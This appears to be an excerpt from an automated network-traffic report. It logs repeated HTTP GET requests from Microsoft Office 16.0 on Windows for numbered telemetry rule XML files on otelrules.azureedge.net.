Source: global traffic	HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
